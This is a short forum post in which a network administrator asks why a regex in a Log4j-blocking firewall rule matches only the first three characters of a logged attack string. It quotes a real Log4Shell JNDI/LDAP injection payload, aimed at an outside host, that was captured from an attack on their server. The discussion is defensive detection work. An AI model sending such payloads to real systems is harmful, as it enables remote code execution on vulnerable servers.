Forum Discussion
CarloMun
Dec 19, 2021
Nimbostratus
Hi @Daniel Wolf,
thank you for your quick reply. Well, I actually already tried to get my answer via regex101.com.
Here is what somehow surprises me:
If I type in this string
/${jndi:ldap:/55.55.55.55:1389/Exploit}
which I extracted from a real attack / exploit attempt against one of our production servers:
info tmm[13241]: Rule /Linux/LOG4J-iRULE-BLOCK <HTTP_REQUEST>: log4j_rce_detection drop on URI: /${jndi:ldap:/55.55.55.55:1389/Exploit}
I only get a match on the first 3 characters:
Is it meant to be so? Or am I missing something here?
Thank you for clarifying.
Best Regards